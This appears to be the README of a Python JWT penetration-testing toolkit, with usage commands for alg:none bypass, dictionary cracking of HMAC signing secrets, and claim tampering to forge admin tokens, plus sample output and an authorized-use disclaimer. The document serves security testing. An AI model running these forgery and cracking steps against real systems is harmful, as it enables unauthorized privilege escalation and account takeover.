Share
## https://sploitus.com/exploit?id=33B94765-A904-5A69-B085-1C09604D9A05
# JWT Exploit Toolkit



A Python-based JWT (JSON Web Token) vulnerability testing toolkit for penetration testing and bug bounty engagements. Automates detection and exploitation of common JWT implementation flaws.
## Features
- **Token Decoding** โ Decode and inspect JWT headers, payloads, and signatures without verification
- **Algorithm None Attack** โ Test for `alg:none` signature bypass vulnerabilities
- **Secret Brute-Forcing** โ Dictionary attack against HMAC-signed tokens (HS256/HS384/HS512)
- **Claim Tampering** โ Generate forged tokens with modified claims (role escalation, user ID swap)
- **Expiration Bypass** โ Test for tokens with missing or unenforced expiration checks
- **Report Generation** โ JSON/CSV output of all findings
## Installation
```bash
git clone https://github.com/icy89/jwt-exploit-toolkit.git
cd jwt-exploit-toolkit
pip install -r requirements.txt
```
## Usage
```bash
# Decode a token (no verification)
python3 jwt_exploit.py decode -t "eyJhbGci..."
# Test alg:none bypass
python3 jwt_exploit.py none -t "eyJhbGci..."
# Brute-force the signing secret
python3 jwt_exploit.py crack -t "eyJhbGci..." -w wordlists/jwt_common.txt
# Crack with rockyou
python3 jwt_exploit.py crack -t "eyJhbGci..." -w /usr/share/wordlists/rockyou.txt
# Tamper claims (escalate to admin)
python3 jwt_exploit.py tamper -t "eyJhbGci..." -c '{"role": "admin"}' -s "discovered_secret"
# Full scan โ run all checks
python3 jwt_exploit.py scan -t "eyJhbGci..." -w wordlists/jwt_common.txt
# Export results
python3 jwt_exploit.py scan -t "eyJhbGci..." -w wordlists/jwt_common.txt --output results.json
```
## Example Output
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ JWT EXPLOIT TOOLKIT โ
โ by @icy89 (Victor B.) โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Decoding token (no verification)...
Header: {"alg": "HS256", "typ": "JWT"}
Payload: {"user_id": 42, "role": "user", "exp": 1735689600}
[*] Testing alg:none bypass...
[+] Forged token generated (test against target)
[*] Brute-forcing signing secret...
[+] SECRET FOUND: password123
[+] Tested 847 candidates in 0.3s
[*] Generating tampered tokens...
[+] Admin escalation token: eyJhbGciOiJIUzI1...
[+] User ID swap token: eyJhbGciOiJIUzI1...
```
## Project Structure
```
jwt-exploit-toolkit/
โโโ jwt_exploit.py # Main CLI tool
โโโ lib/
โ โโโ decoder.py # Token decoding and parsing
โ โโโ cracker.py # Secret brute-forcing
โ โโโ attacks.py # Attack implementations
โ โโโ reporter.py # JSON/CSV report generation
โโโ wordlists/
โ โโโ jwt_common.txt # Common JWT secrets wordlist
โโโ requirements.txt
โโโ LICENSE
โโโ README.md
```
## Wordlist
The included `wordlists/jwt_common.txt` contains 200+ commonly used JWT signing secrets gathered from public disclosures, default configurations, and common developer patterns. For comprehensive testing, combine with `rockyou.txt` or SecLists.
## Disclaimer
This tool is intended for **authorized security testing and bug bounty research only**. Only test against systems you have explicit permission to assess. The author is not responsible for misuse.
## License
MIT License โ see [LICENSE](LICENSE) for details.